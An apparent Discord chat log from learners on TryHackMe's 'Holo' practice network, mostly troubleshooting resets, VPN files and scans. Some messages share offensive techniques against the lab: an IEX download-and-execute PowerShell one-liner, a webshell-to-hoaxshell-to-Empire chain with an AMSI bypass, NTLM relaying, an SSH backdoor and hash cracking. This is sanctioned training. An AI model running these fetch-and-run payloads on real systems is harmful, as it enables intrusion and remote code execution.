Yes, although the very final step could be difficult as it involves an attack my co-creator found and is only documented in a few locations. Everything else is easily done from a black-box approach

task 19 cant exploit the docker suid binary cos i didn't stabile the shell? 💀

need redo the attack chain from task 14

Perfect, thanks for the heads up. I'll get on with it then👍

Gave +1 Rep to @lone spruce

Alright holo - here we go!

holo was a good time ty team who put that together

Hey guys. Is the Holo network down right at the moment? After it has paused i am not able to reach any of the hosts again. VPN is fine. Tunnel is up and routes are correct. Maybe someone can upvote the reset button?

is the web page for L-SRV01 supposed to be "parked"?

how long does it usually take for a network to reset? I wanted to tackle this network but it has been saying resetting since i opened the page and I can't reach any hosts.

anyone know whats wrong?

It suggests where to go to see more info

On Task 14.. I can't seem to stabilize the shell... and only some commands are providing data to stdout

is there a way to confirm what's working and what isn't?

nm. i answered my own question

for anyone else having this issue... i figured out that for some reason although the instructions on the task direct you to run python as just "python"... i got this to work by hunting down (find / -type f -name *python* 2>/dev/null) exactly which version of python is installed

and then i just ran

/usr/bin/python3.6 -c 'import pty; pty.spawn("/bin/bash")'

voila! stabilised shell

on task 16... my network went to sleep or crashed.. whichever

and now, i can't reach 10.200.155.33 (literally, no route to host)

ideas?

Hey Jedis. This my second go at this network. If anyone wants to link up to work on it together let me know. Hacker's unite!!!!!!

Lets go bois, I'm goinG in on the holo challenge

wish me luck

could be several of us scanning 33 at the same time. I had to change some of my scans to a lower thread. Right know I cant reach 33 either. crossing fingers it response soon lol. Just realized my subnet is .109.33 so we both in the same boat.

We need 2 more for the reset. System is still showing "Destination Host Unreachable"

WB back baby!!!!!!

Can I get a reset on 10.200.114.0/24 please, L-SRV01 has crashed and continues to be unresponsive

Can I get some love on .109.33 and can we thread our scans a little lower. admin.holo.live is becoming un responsive. I can get pings but the site is not loading when trying to log in. Hackers UNITE!!!!!!!!!!!

Working on Task 21. The user that should be in the shadow file is not there, not sure if it was overwritten by a user or something I am missing. Any advised would be cool?

we in business

any admins here?

need help with the ssh keygen

@dusty forge ??

THM staff are not here to offer help with content

I am connected via the holo vpn but the network seems to be hosed. i am unable to get any response from the 10.200.95.33 machine and, even though I am connected via VPN (verified on the Access page) I am unable to click the reset button to vote for a reset because the page thinks that I am not connected

I downloaded the VPN profile for Hololive and always get a zero byte file.

#holo-network message

Try this?

Thanks for your prompt suggestion, but my problem still persists 🥹

Gave +1 Rep to @spare beacon

wreath vpn profile can be downloaded, but only hololive returns an empty file

Tried that 3 times with no luck. Still get zero byte file.

Send a screenshot of your network diagram at the start of the room?

When I leave the one room and go to the jr room there's no option to join.

Is that correct?

Sent you a screenshot

Stuck on "Task 47". This is the second time I try a Win command that is suppose to restart the end point not shut it down. The documentation says "We can now restart the machine; it is essential that you restart the device and not shut down the device. Give the server a few minutes to restart; scan the server again and ensure it returns as closed."

CMD: shutdown /r

Attempted too:
xfreerdp
evil-winrm

Any update on the empty openvpn config file? Has the issue been fixed?

Guess not. Just tried again.

no more 69 subnet from the days of pre release holo testing

https://tryhackme.com/room/hololive

Just a homie asking for a reset

;-; website hasn't been responding (on the attack box)

nvm.

protip ** redo the nmap scan on the subnet

hey is the network down ?

cant access holo.live

Are you using the holo vpn?

$ gobuster vhost -u http://holo.live -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt

Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://holo.live
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
[+] Append Domain: false

2023/04/07 11:37:17 Starting gobuster in VHOST enumeration mode

Found: 1 Status: 400 [Size: 422]
Found: 11192521404255 Status: 400 [Size: 422]
Found: 11192521403954 Status: 400 [Size: 422]
Found: gc._msdcs Status: 400 [Size: 422]
Found: 2 Status: 400 [Size: 422]
Found: 11285521401250 Status: 400 [Size: 422]
Found: 2012 Status: 400 [Size: 422]
Found: 11290521402560 Status: 400 [Size: 422]
Found: 123 Status: 400 [Size: 422]
...

What am I doing wrong here?

I added the domain to /etc/hosts and when I try to ping the webserver, I get pakets back. But gobuster just gives me Status 400 response

I would recommend this command ||gobuster fuzz -u http://FUZZ.holo.live -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --no-error --exclude-length 1016 -b 400-499||
use gobuster fuzz --help to get along with the command. Also remove some of the flags to understand it. 😉

Thanks, for your help. That worked! I guess I need to invest more time into gobuster and its options 🙂

Hi
I connected to the network with the OVPN file. Had an issue with the data ciphers option, added it to the file as always. Established a connection successfully , checked it via the dedicated site.
Checked if the network is up and running for more than 8 minutes, recommended 5 usually isn't enough in my experience.
Then after attempting to get a port sweep of the subnet, I received "no-response" from 10.200.64.0, 10.200.64.1, 10.200.64.2, 10.200.64.3
Then got an error about probes being dropped from nmap only to realize my ovpn connection has been terminated for some reason

Restart your Kali machine, regenerate your VPN file, also I usually scan using the -Pn argument, it tends to play nicer to hosts that don't respond to ping, even if it did respond to a ping I do it either way because I've had issues like that with nmap in the past

Alright will try. I also tried using masscan but that went even worse. I assume networks don't take kindly to it?
Anyway, I will post here again once I get this over with. Got such a headache I can barely think straight lmfao.
Thanks !

Gave +1 Rep to @drifting ravine

You can also message me directly if you have any issues, whatever you prefer, I don't mind

today holo is giving problems

someone can totally reset the network 10.200.95.0/24?

plus if one uses nc in the rce... and if the nc session get canceld in the terminal with cntrl +c ... the server keeps hanging... making it impossible to work with

I'm getting crazy here

I think someone fucked up the port 80 of the first webserver

Please God of the Server, gives us a Manifestation, tell us how stupid we are and get rid of our stupid problems!

@zenith delta

ping ping ping!

stabilise the shell mate

22 / ssh is allowed. You can also make an ssh backdoor then. Gosh I hate the word

?? I don't even have a shell in there I cannot even reach port 80 to gain the first foothold

ip 10.200.95.33

is that right?

you look sus

I meant this

yeah same
Honestly, this is sad. I've been going insane thinking all of the issues I've been met with when attempting this network were on me.
Shame I don't have money to spend on my own lab 😂
That's what I get for not having a job once in my life

xD don't be hard on yourself... this should be a service to people that might want to pay too... plus it should be treated with TLC because the aim of the platform IS NOBLE

But honestly the reset timer and the counter shouldn't be that high

Ill now try to leave the room and rejoin it in 30 minutes hoping the network IP assigned to me won't be the same otherwise Ill kill myself

ffk

mate I paid for it though haha. For THM subscription I mean

Nvm I thought raspberry pis weren't this cheap.
Well, time to see if learning how to setup a lab on my own network is worth the effort. If so I'll just work on that instead of public ones here LOL

I've been doing a lot more theory lately , making notes etc. instead of practice so I thought I was rusty af and missing smth

but you are right, this is paid service... we shouldn't be too laid back about that...

Admins since this is not probono charity will you answer my prayers and please reset the 10.200.95.0/24 holo network?

https://tenor.com/view/please-pray-for-me-gif-24788677

I reached the 80 on the 10.200.95.33 thank you jeeeezuz

Anyone know if there's problems with the .33 host atm?

Seen the posts above and I can't seem to scan / interact with .33 on the 10.200.114.0/24 subnet.

You got it? Perfect, sorry sir I wasn’t online

Restart your Kali machine and VPN

Unfortunately same issue, can see and interact with 250, but 33 is a no go. Cheers though! 🙂

You can always vote to reset the network, that's what I do usually after making sure I restart my machine and connect to the VPN

Ya, think a few others on the same subnet may be having a similar issue.

doh!

nudge

weirdly, it's just popped up.

If anyone was reading this and did something, thankyou

same issue here... the server .33 is hanging after a nc session went off

it seems there isn't a daemon set in there that will restart to a default state all the processes after a while

but I say that the issue might be resolved with a lower restart counter

this is not good guys...

it has been already 30 minutes

-.-

In the whole day today I must have wasted something like 1.45 hr for this kind of issues

still the same

another 40 min went by

Yeah I abandoned hope for doing this network for the foreseeable future.

Yeah, the .33 is messy. But once you get through it, there aren't any issues.

Love your bio 😂

😅. I love messing with AD. I dont get to do any of it in my current intern tho .

; -;
How did you get an internship may I ask? I'm self taught and while I love this , I'm kinda anxious about how one gets a job after getting a certificate.

and you know, just how this whole "job" thing works 😂 ||cold sweat||

After getting OSCP, i just did the "spray and pray". Got an intern working webapp pentests at a startup which has evolved into a fulltime-ish role which I can legally only call an intern. Almost a year working with them so I do other things too not just pentests.

Its getting your resume on the right desk at the right time i feel.

Aighty. Thanks. Glad to know there just might not be some secret knowledge required to get a job !

Gave +1 Rep to @storm sun

Good english and communication is a must js. I have seen my manager shun ppl just for that.

But yeah, other than that it just varies. Some ppl need a very specific thing in their new employees and thats what they ask in interviews.

I was asked webapp ques only. Nothing too over the top. Having oscp was a boost to my application since i wasnt 100% sure of answers and the interviewer could tell that.

Okay, anything outside the scope of OSCP then? I've heard a number of people with OSCP had problems with at least a few questions during interviews. Blind SQLi and other stuffs. Any tips what should I learn about after getting it?

Upto the role you are applying for i guess. Pentester roles sometimes want you to have some exp with android/ios too. You cant really fit the criteria for all job roles which say pentester because all of them have different job descriptions haha.

CySec is too broad to guess what your interviewer will ask you i feel. Apart from the things like CIA triad sometimes and things like OWASP TopTen.

Spray and Pray is the solution to finding a role that suits you.

"Try harder" even when it comes to finding a job it seems. Welp, such is life 😂
Thank you so much for answering all of my questions. They certainly helped clear the cloud of uncertainty that's been following me for quite some time now.
I'll be going now.
Good luck and happy hacking !

anyone else have issues reaching dev.holo.live? I can connect to the main site

Holo Network is mega unstable... or perhaps it's just me

Task43: If someone can give me a hint on which scheduled task I need to hunt, I tried to dump all services and scheduled tasks, then compare if there is any similarity but I can't really find anything ...

Facing Issues with Holo VPN

I can't download the vpn file for Holo Network. Trying to download it goes to the 404 error page (Lost in matrix). Tried regenerating the file, restarting my computer, changing browser to access Tryhackme. But nothing worked. The other networks work.

Can you leave the room for 15 minutes, then re-join?

okay

Doesn't really work, I checked similar thing some time ago. But I'll do it again

I know that Holo is shared - but in all fairness, for the majority of the lab networks I would pay extra to allow for private sessions. The amount of times the lab failed and needed to be reset is silly...

Hi someone can please help me with AV evasion? I'm searching a proper payload for powershell empire...

or in any case ... the way you used to hack into the 10.200.x.33

(when you uploaded the covenant shell)

I used hoaxshell standalone listener along side with the cmd-curl payload

Bake the payload in a php wrapper to execute it and you are good to go

https://github.com/t3l3machus/hoaxshell

So you used hoaxshell alone, or alongside powershell-empire to then inject in memory modules?

Just throwing it out there - but sometimes a simple substitution goes a long way:

powershell "IEX(New-Object Net.WebClient).downloadString('http://<address>/<agent>.ps1')"

Anyone also having issues connecting to Holo today?

If i use the command you shared... Ill get an error that tells me that the payload im using (which is a powershell empire payload) has too many characters

You mean my approach? I use it regularly to load a sliver binary wrapped in powershell... that is 80+ megs of data, and it works without flaw. Can you share your screen output?

That's great ill share asap

[Fail] There was an error reading the response, most likely because of the size (Content-Lenght: 6560964). Try redirecting the command's output to a file and transferring it to your machine

What did I do?

1. I run a php rce, got a php cmd webshell,

2. I inserted the hoaxshell payload in the php shell,

3. From within the hoaxshell, I bypassed the Amsi

4. in the same powershell session, I tried to run the command you used to reach for my powershell empire payload,

5. the command I used is:
   IEX(New-Object Net.Webclient).downloadString('http://10.x.x.8x:443/download/powershell/[BASE64ENCODEDPATH]')

6. the response is:
   [Fail] There was an error reading the response, most likely because of the size (Content-Lenght: 6560964). Try redirecting the command's output to a file and transferring it to your machine

If I do:
curl http://10.x.x.8x:443/download/powershell/[BASE64ENCODEDPATH]' -o paypay.ps1
And then:
./paypay.ps1
It sais: "[Fail] There was an error reading the response, most likely because of the size (Content-Lenght: 6546960). Try redirecting the command's output to a file and transferring it to your machine"

If I just copy and paste the code in the hoaxshell, it prints out:"[Fail] There was an error reading the response, most likely because of the size (Content-Lenght: 6585388). Try redirecting the command's output to a file and transferring it to your machine"

It actually hit the powershell-empire server but then that error comes out

Can I change the way powershell-empire send stagers?

[ERROR]: B: admin/get.php requested by 10.200.111.31 with no routing packet.

Something odd seems to be going on in my end. After the network reset, the 10.200.x.x web server now has a 192.168.100.x IP on the tryhackme network diagram. I tried scanning the old IP at 10.200.x.x and it showed only SSH was up. Network uptime is 21m.

Even mysql is running on it. Everything as it was but nothing on port 80!

Hi guys, I'm working on Task 47 NTLMrelayx task. I received connectivity from the DC but fail to establish connection

[*] SMBD-Thread-54: Connection from HOLOLIVE/SRV-ADMIN@127.0.0.1 controlled, attacking target smb://10.200.107.30
[-] SMBClient error: Connection was reset
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] SMBD-Thread-57: Connection from HOLOLIVE/SRV-ADMIN@127.0.0.1 controlled, but there are no more targets left!
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] SMBD-Thread-57: Connection from HOLOLIVE/SRV-ADMIN@127.0.0.1 controlled, attacking target smb://10.200.107.30

I tried suggested solutions such as ntlmrelayx v0.9.22. The connectivity between attacking device and DC is also fine and my proxychains is version 4. If anyone have an idea, please let me know. Thanks!!

Ah little detail: I'm using sshtunnel to reach the server i need to reach

I cannot send screens

You have to verify first

!docs verify

Is the .DLL hijack bugged?

because it asks me to be administrator but Im just a user... plus there is no Scheduled task with that kav*.exe

still not working

Hi, I'm connected to Holo's VPN but I get no pings or open ports via nmap to any of the stations on the network

anyone having issues logging in to a***n.holo.live even after reset?

Hi, I am on task 8 it says 10.200.x.0/24 as the target network.

Not usre if I understood that correctly but does it mean any IP from 1.0 to 254.254

something like that

?

and also how to translate that to nmap instruction

If you're still here, this helped. Thanks for posting.

Gave +1 Rep to @quiet raft

My rustscan seems to be going on for pretty long, is my command right ? it is for task 8. I am not too sure about the network selection though.
||rustscan -a 10.200.109.0/24 -t 5000 -u 5000 | tee rust_holo.txt ||

Appreciate all inputs. the task says scope of engagement in 10.200.x.0 ?

My assigned IP is 10.50.109.108

Hi, are there any official THM reps in the channel ?

You've made a guess here that 10.50.109.108 means your subnet is 10.200.109.0/24?
Have you looked at the network map at the top of the page?

THM staff aren't here to provide support with content

Any support with content is provided on a volunteer basis

yeah, I looked at the network map & to the IP I was assigned and considering that the subnet would collide

I assumed 😦

Please can you be more specific? What's in the map?

They're 10.200.something.something in the map right? With the exception of a 192.168 address?

I can't paste images somehow , but yeah there is a ||10.200.112.33||

Ok, so x in your case is 112

Because I completed wreath earlier so I assumed someone might have solved it this far hence the map is open :D. So my question would be that these hosts on the network are not necessarily pivots to the internal network ? I mean if I have the host why would I be scanning the network and would only be focusing upon theports on the 10.x host in the diagram. Hope I am making myself clear ?

The map is only for you individually

Thank You! ❤️

Gave +1 Rep to @quiet raft

Not quite sure what you're trying to say here

ok, if I may elaborate. Task 8 says to scan the subnet, while we already have the host identified in the network diagram. So do we still haev to scan the network or we can directly jumps to the host looking for open ports.

You've got the IP of a single host

Within the network

Wouldn't it make sense to go looking for more hosts?

yeah it does, so it might not necessarily be a pivot or have the required ports open. I see the point

Thanks for that.

Not just that. You want to know the lay of the land. What's out there? Whether systems might be talking eg a database server and a webapp server

I am new here just joined today, is there someone I have to request some roles, I see I cannot paste pictures in teh chat.

Or even domain controller and some workstations

!docs verify

Follow those steps and you should then be able to post images, plus you'll get your shiny THM level here

Thanks much!

Done. And images work.Awesome.

I think Holo is broken, it's stuck on Resetting for a while now

3 hours later, still stuck on Resetting.

Anyone help to solve this problem

How to connect mysql database

leave room and then join again, it will give you another subnet

Bro at task 21 , I can't get any hashes from the shadow and passwd file whats can i do ??

Tell me fast because today i want to complete this Network

do you already escape the container?

@royal wren

thank you

Gave +1 Rep to @pearl apex

Hey guys, any idea why I can't get a reply from the public-facing server? I got the IP right (||10.200.107.33||) and VPN connected, yet I can't get any response from either nmap or ping

Make sure u have started the holo network machines first

I did

I'm working on it right now ,its fine actually

Did u generate the vpn file for holo network specifically ?

Yeah, guess something must be wrong with the vpn config

Whenever u download the vpn file ,always regenerate it

And then download

And In my case ,i finished wreath previously and then started holo , but for some strange reason i was conected to the wreath vpn (I had two network card interfaces ie tun0 and tun1) .I restarted my virtual box again .It was fine

So once check with ifconfig , if u have this issue too

Nope... I'll try leaving and rejoining

Click regenerate and then download the vpn file again for holo network

Is the Holo network hung? For me it looks like it is stuck on "resetting"

Refresh your page

I did.

Although it's true I can't connect... huh

🙂

And the odd thing is the reset vote section is 4/5 so seems to be hung or something.

2/5 and running for me

Very strange for sure.

I see, I have multiple utun interfaces, but restart doesn't help...

Any ideas?

Then restart ur pc and seee

R u using virtual box or ur own machine ?

My own machine

but restart doesn't help...

It's an M1 MacBook pro

Okay, So u r using linux dual boot or something like that ?

For Me i was using kali virtual box ,i simply closed it and opened it ,And i didn't have like tun interfaces .

MacOS

U use MacOS for hacking?

Yeah

Wow Lol

Restart usually shuts everything down in windows atleast as of i know

Yeah, there's something keeping utun0-utun2 occupied from the system

I never tried using my host os for these purposes ,Kali linux comes with all tools installed and its easy to use too

Maybe check some forums for it

I remember once i connected radmin vpn in my windows ,the interface kept showing forever .

Ig anyways u would have used tryhackme several times so u must be familiar already . When u connect to the vpn ,does it show initialization complete?

Yeah, it shows connected both in OVPN and in THM

At times when u switch ur wifi too ,It won't connect

And u tried pinging that .33 address and it didn't work ?

yeah, got time out

Did u try accessing the web page ?

Doesn't seem to work either

Very weird and ur holo network ,does it show running ? Refresh it and see once

Yeah, running

Contact the tech support for help maybe and see

The problem is this is not a THM issue

Might be ,i'm not familiar with MAC OS ,so idk how to help u .

Guys i dont know whoever faced this issue after getting the creds through LFI on admin.holo . i am not able to get login to the dashboard

Could anyone help me out to rectify this issue

@still nimbus

You can get into the dashboard ,the issue is lot of ppl r bruteforcing and using stuffs like gobuster and hence we are unable to log in .

I was able to get in once today but after that it has not been possible

It would be great if ppl reset the machine

Please don't ping staff for help, that's not what they're here for

There are several instances, please make sure you specify which instance you're on when asking for resets. The instance is the third octet of the machine IPs

10.200.95.33 ie 95

@buoyant plover thank you so much

Gave +1 Rep to @buoyant plover

My apologies

In my case the .35 machine has some issue .I'm unable to connect to it via rdp and i can't even access the shares of the machine .Its seems to be up tho ,i was able to do nmap scan and ping it . My ip 10.200.95.33.

The network is resetting since yesterday, is it normal ?

similar for me .... the ports are filtered / tcpwraped

i didn't get it as filtered tho ,Maybe u r scanning it from kali machine without port forwarding/ proxychains might be why u r getting it as filtered.

rechecked + rescanned, now they do not appear as filtered (I could swear ~1h ago they were filtered) ... (I am using sshuttle)

but the RDP is not working.....smb shares not available

Same

This holo is breaking my head Lol ,each day it has some issue

@buoyant plover sent in PM the error for RDP

Hey gentlefolks - anyone ever run into issues lateron in life with Google Collab? I just got a permanent ban for "potential abuse" of the platform .

Is the root password crackable? (Already got other two hashes)
Default rockyou didn't help.
Using NVIDIA GeForce RTX 3050 Ti with the command: hashcat -O -a 0 -m 1800 hash.txt -r OneRuleToRuleThemAll.rule rockyou.txt the estimate is ~92 days.

Task 37:

~~Why are remmina & xfreerdp failing while rdesktop works? Is it setup that way or simply a bug?~~Stupid thing started working correctly.

Nmap scan says theres no SMB service running on that host either (so both cme and evilwinrm are failing too).

Task 39:

Do I have to install .NET frameworks on the target?

Appreciate any help in Task 8 in Hothe lo room, I can't access the webserver of the first machine.
I can see that the port is open but can't access it also no Info using -A command.

admin.holo is pain cant get rev shell always timeout

Unable to connect to the network after a while. The network is running, VPN is connected but cannot ping the entry point.

Even rebooted my machine

the entry point machine is not stable at all

being stuck for 3 days

Same here - I gave up 75% in.

Hey! Can anyone assist with the last task?

the entrypoint in the 10.200.109.X should be reviewed. It should not be the norm to have to wait up to a minute or more just for a command to process.

Can someone solve my issue

When i connect openvpn it shows connected but while i do ping to the machine. Ping don't respond.

are you sure you have access to the machine

because its a network and there are multiple machine

only one machine is public facing which is holo.live

i want help for the amsi and anti virus bypass

im stuck

hi guys

i have a question

if i want to ping a server out of my network subnet ... would my pc make an arp request to know what is the mac address of my default gateway or it wont if its already stored in arp table

vote for restart

its needed

State your subnet

its needed

after dll hijacking, adding a new administrator, when ever i stop smb for NTLM Relay Attack, im not able to loging with my new administrator

but before stopping its fine and i can easily login using xfreerdp

its say username or password incorrect

hi, isn't this supposed to show PC-FILESRV01 and FILE-SRV01?

No i think it's good because 30 is a domain controller, and you have to perform NTLM Relay attack

@surreal storm
https://systemweakness.com/remote-ntlm-relay-attack-relay-through-a-proxy-7f155dc478b2

Walkthrough of DC takeover

thanks I'll look into this tonight

but it was working fine a few days ago without having to do this, then I disconnected from the machine and it didn't work anymore

I just had the sshuttle from the linux machine

how to hack feces

if you are done with domain controller take over i have some questions can we discus